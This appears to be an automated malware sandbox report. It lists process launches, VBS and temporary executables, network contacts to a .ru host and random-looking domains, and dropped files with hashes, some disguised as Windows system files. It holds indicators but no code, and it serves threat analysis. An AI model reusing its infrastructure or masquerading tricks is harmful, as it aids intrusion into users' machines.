C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3ccf5517-81b1-45e4-877e-0f87c4f67da6.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82144091-2f8b-4bde-84b2-38e96b9e9961.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp67F7.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8445539-b919-4c4a-a633-eb3f19759892.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\07de029b-7705-47cc-9000-f15ad18e9a66.vbs"

C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmp9A04.tmp.exe"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\25db516b-c1d6-4ef1-992a-e30ca6f3def4.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6b4d9ade-0a14-4bd3-91ff-60e9432ac03f.vbs"

C:\Program Files\Mozilla Firefox\fonts\Registry.exe

"C:\Program Files\Mozilla Firefox\fonts\Registry.exe"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c16ad20b-fb7f-48ba-8ccc-75b2241ec03e.vbs"

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\95274962-9825-49cc-bb2f-8943f1a83ccb.vbs"

C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe"

C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe

"C:\Users\Admin\AppData\Local\Temp\tmpD2C7.tmp.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 81888.cllt.nyashteam.ru udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 200.186.67.172.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp
US 172.67.186.200:80 81888.cllt.nyashteam.ru tcp
US 8.8.8.8:53 zpltcmgodhvvedxtfcygvbgjkvgvcguygytfigj.cc udp
US 8.8.8.8:53 yugyuvyugguitgyuigtfyutdtoghghbbgyv.cx udp

Files

memory/3216-0-0x00007FFA28463000-0x00007FFA28465000-memory.dmp

memory/3216-1-0x0000000000B70000-0x0000000001064000-memory.dmp

memory/3216-2-0x00007FFA28460000-0x00007FFA28F21000-memory.dmp

memory/3216-3-0x000000001BDF0000-0x000000001BF1E000-memory.dmp

memory/3216-4-0x00000000032D0000-0x00000000032EC000-memory.dmp

memory/3216-5-0x000000001C590000-0x000000001C5E0000-memory.dmp

memory/3216-7-0x00000000032F0000-0x0000000003300000-memory.dmp

memory/3216-6-0x0000000001970000-0x0000000001978000-memory.dmp

memory/3216-8-0x000000001BF20000-0x000000001BF36000-memory.dmp

memory/3216-9-0x0000000003300000-0x0000000003310000-memory.dmp

memory/3216-10-0x000000001BF40000-0x000000001BF4A000-memory.dmp

memory/3216-11-0x000000001BF50000-0x000000001BF62000-memory.dmp

memory/3216-12-0x000000001CB10000-0x000000001D038000-memory.dmp

memory/3216-15-0x000000001C5E0000-0x000000001C5EE000-memory.dmp

memory/3216-14-0x000000001BF70000-0x000000001BF7E000-memory.dmp

memory/3216-13-0x000000001BF60000-0x000000001BF6A000-memory.dmp

memory/3216-18-0x000000001C610000-0x000000001C61C000-memory.dmp

memory/3216-17-0x000000001C600000-0x000000001C608000-memory.dmp

memory/3216-16-0x000000001C5F0000-0x000000001C5F8000-memory.dmp

C:\Windows\es-ES\winlogon.exe

MD5 6e7923159a06c48bb09a81080d2d8266
SHA1 a2126afd2d75f3dedb602fd7f63b9940e0b47c22
SHA256 4df2dbcbeb6a3e0e6909c6bf1543308f4de207ee57a904fda2ed2ed0e6522b14
SHA512 d2ddd13c739e92febab2685f393aeed15140c4b03d3c15ec49c86bac764ab6e3a01982a64118bd9d4e700161b85e1a7f3a91f904322ecc17d6253174a08f4365

C:\Users\Admin\AppData\Local\Temp\tmpB603.tmp.exe

MD5 e0a68b98992c1699876f818a22b5b907
SHA1 d41e8ad8ba51217eb0340f8f69629ccb474484d0
SHA256 2b00d8c2bcc6b48e90524cdd41a07735dc94548ed41925baff86e43a61a4c37f
SHA512 856854f5fd89ae1669e4b2db10b73b4a78496bf80117003244c83e781f75e533e2e2bea9aa6c1b3aba3db1ed92ea0ed9755fbfd78cd6c86ba95867d07fc0ece2

memory/3692-68-0x0000000000400000-0x0000000000407000-memory.dmp

memory/3216-139-0x00007FFA28463000-0x00007FFA28465000-memory.dmp

C:\Program Files\Windows NT\TableTextService\en-US\csrss.exe

MD5 34ba4fc948fa96e770d3b9c113a9b1ba
SHA1 15896a3edfedfda790940cfff8f789507b4f01c5
SHA256 6c0e60d3796f73dab9d0c35f0bef7c69cf0a34133f35555d9811e92d407eab61
SHA512 c0533332c6d792d827d81b1607bd42c4860cb28c11e5d05606cd0c7b683b051f58a66d6ccb015d85dbae223cdffed5491ae7ecc2d54c7a98bdbc0b23dab48588

memory/3216-154-0x00007FFA28460000-0x00007FFA28F21000-memory.dmp

C:\Program Files\Mozilla Firefox\defaults\RCXDC87.tmp

MD5 ef4e169ef6834d5a414c398f022bb198
SHA1 911b386194313c6d8ac424b3b6ca3059550a20fd
SHA256 3a6981f3dbdc904b463fd575c8088ac8aabf9b3b93c7e0c2219fb662ba33097b
SHA512 5402b064fbaaecfec3cd387caace1bf0a22805087559087f4bb7ff33b45141d4e32448bababb1542cfbcf0691e5cb750cf659258e995e400a06fd67f677ea93a

memory/3216-195-0x00007FFA28460000-0x00007FFA28F21000-memory.dmp

memory/2400-210-0x000001C0D1B60000-0x000001C0D1B82000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fkc2jojo.n0b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\JXArPKtZVz.bat

MD5 618768ea4dfba758667e58f487cc962c
SHA1 b8861c587cc860056d574f9a4a9fb69c278be206
SHA256 4be795aec855328f747ef44bd4d7ab77f65e02911e1220aaf3631c9acf9d1286
SHA512 31e893aa1097d2f9e142cc4262f72ad808f2fa4afd0c0506a6a2ea8e39f21a1a67b48203f75a4b11d90f12c9e9ec9a3210a56c6a1547a82c28b518a356ce628c

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6d3e9c29fe44e90aae6ed30ccf799ca8
SHA1 c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA256 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA512 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 bd5940f08d0be56e65e5f2aaf47c538e
SHA1 d7e31b87866e5e383ab5499da64aba50f03e8443
SHA256 2d2f364c75bd2897504249f42cdf1d19374f5230aad68fa9154ea3d03e3031a6
SHA512 c34d10c7e07da44a180fae9889b61f08903aa84e8ddfa80c31c272b1ef9d491b8cec6b8a4c836c3cb1583fe8f4955c6a8db872515de3a9e10eae09610c959406

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 5f0ddc7f3691c81ee14d17b419ba220d
SHA1 f0ef5fde8bab9d17c0b47137e014c91be888ee53
SHA256 a31805264b8b13ce4145f272cb2830728c186c46e314b48514d636866217add5
SHA512 2ce7c2a0833f581297c13dd88ccfcd36bf129d2b5d7718c52b1d67c97cbd8fc93abc085a040229a0fd712e880c690de7f6b996b0b47c46a091fabb7931be58d3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2e907f77659a6601fcc408274894da2e
SHA1 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d
SHA256 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233
SHA512 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 32eb22918ace6c7c852e6547fee66953
SHA1 8608868448f9c6f0a42d06a8f833b5598236f159
SHA256 a1d8638e84347a9b06b2f3ad194e72eef4783d24d26feccb7a8e46b1d907eace
SHA512 9bb067f85829cdde4287e55dd1d1ba1645d59811560594a430e47166d907e30c4680bd7af1e380ca41240c4d4370ed371494f2151b6a8523ebe5bc7dabba6bb3

C:\Users\Admin\AppData\Local\Temp\8871802c-fbd3-4866-bb96-e8b1f0eab784.vbs

MD5 160e8cfd01eb375fedf778bf7fe36ad9
SHA1 f52eb95b56126347645689b5d0a5db0dbdcce3be
SHA256 b290b72a58ae66a4d2d1c7118eb80ff2935412930a7904b069b62b04878e8a15
SHA512 6fa51840070154ef9ad5862f967c877c12a2f96945277ef7bc1895ac74e7473285d9469d2a66aca4ea767332ab7d8b3457eed21dc21bd60f9f3c15a35829db3b

C:\Users\Admin\AppData\Local\Temp\ac7ffc9f-ba9e-46d6-ba56-7f58f6154415.vbs

MD5 c465cb464ca9b5b4748df804cd4b0f56
SHA1 f81a8b9d7a4d3f4c67f2ea3894157549c3277887
SHA256 2070e1e8634721a03f31632c87202e918c56e7b50c6a2489ae8182a35f4aea43
SHA512 99b2ec07e3a08ead1d451047a93108f8e08e459d74cd71eeda561635fcb2cfc38a7d0039c12f5be61fb0d83fb429aa3640405569c00e47b98c00e86bcb5241c1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

MD5 4a667f150a4d1d02f53a9f24d89d53d1
SHA1 306e125c9edce66f28fdb63e6c4ca5c9ad6e8c97
SHA256 414659decfd237dde09625a49811e03b5b30ee06ee2ee97ea8bcfac394d281fd
SHA512 4edd8e73ce03488a6d92750a782cd4042fbb54a5b3f8d8ba3ea227fda0653c2cd84f0c5d64976c7cdc1f518a2fdc8ff10e2a015ec7acf3cd01b0d62bc98542d8

C:\Users\Admin\AppData\Local\Temp\a74c8e64-e0a5-4767-8876-06c54256768b.vbs

MD5 fe4ead7e6f04b16baf861dc7642ad473
SHA1 377bd237b10ea45c8272ee586efaf8d86b40b9ce
SHA256 5c3304908d80579cde9ebd25304a50d5aed2b333e3651e19672a63018ab6bf0e
SHA512 cc4bdde415c3b1499a29741b042e0a8638c39bd3489c67f1a3fb14220efef28711d426a850bd4f7c5d5ef70c867f68bf6716c4291848147cd1f5060f204be4df

memory/3412-370-0x000000001C120000-0x000000001C132000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\f3744082-178f-4fb8-8305-22168e592630.vbs

MD5 54314c7c2ef931597b90c8769808607c
SHA1 59277f640a25786db49855ebde8536334d7f7f67
SHA256 b17b1024a3a173a6bbc752890a4f8a86130800a52d6608486db380c548f38026
SHA512 519da3c9f17a8dfebcf9b52b78c12bf76ee9163fe11d12e21ff93e445e160eb831341a626c79ad38f5e03400a42c946e0594c4e860645ef6c1e8e3a8abd96bcf

C:\Users\Admin\AppData\Local\Temp\936c0347-2527-44eb-9d63-5c54e41e7c93.vbs

MD5 e8b559e44fd88e51d45235127ed95369
SHA1 d3757953ad940f4cd8117de1a4144f435c88ba7c
SHA256 5cc56c54fa8177a1d02f4022fde17aa8c054589fe4c72fe340a2564b99ee3155
SHA512 60ce853dbf9549409e51d3b4d83bacaf019e96b64b99329b3d2df9bbac3740507e608b7297e41fdd173aed25450d86e98966457d3a59ddee744326a6048569e0

C:\Users\Admin\AppData\Local\Temp\a2523950-b7fd-45b5-a3d3-d892462873ff.vbs

MD5 ff17d74c85c02be7fac1bda91466afb2
SHA1 1c564beb9744181cd1604576158f7e617ba56fdc
SHA256 38d534f008aee802c7cf0e3b2b93bd01ce72b77ea0ecc6991db84277809af416
SHA512 131d36520de7bc96efe2fcdd523c64f5e783b240df3c5605d9b6f4db20fb191cdf36f50338a32b0ba36756b32d7e203356cb203f577f4b3e5a5e2ec64239d13f

C:\Users\Admin\AppData\Local\Temp\78279cce-0834-4ce7-884f-51025e906453.vbs

MD5 a9d872b14aa58e7bc7ab52f15b0d7aed
SHA1 0d897f30f5a74a9f594db56d1e1829223eac1b82
SHA256 242129e9d01d2a3520cb60cce88d57e92fc175dd567b50c8616d43a191d3b25f
SHA512 86cec81e0783d2fa003e92b3fb7382d7849d129a3bced5140f8e96f31284f031a4eb3da22bc2121dd091806394e03626bf31144bde3fa2c129ef178c984a8ebb

C:\Users\Admin\AppData\Local\Temp\f07b0632-e0a0-4834-9cc5-fb3ee37eef0f.vbs

MD5 3aa6b96a617f70e937f9cb8d6724ce3b
SHA1 f38c53060e2bd1f348e346d9bc90318d938e6cd4
SHA256 dcd7af61474c14cae263cf19cdc1bb5e15330a8cf7f6139717d4406e360dc21d
SHA512 6df241699094d695462544443f2e7e236bf1490a7d3d947797a1ef53274a939e9fdc93f74dcc8dcad68d0444cc55692aef6a001b78301490e74d509fdaea2159

memory/3236-522-0x0000000002720000-0x0000000002732000-memory.dmp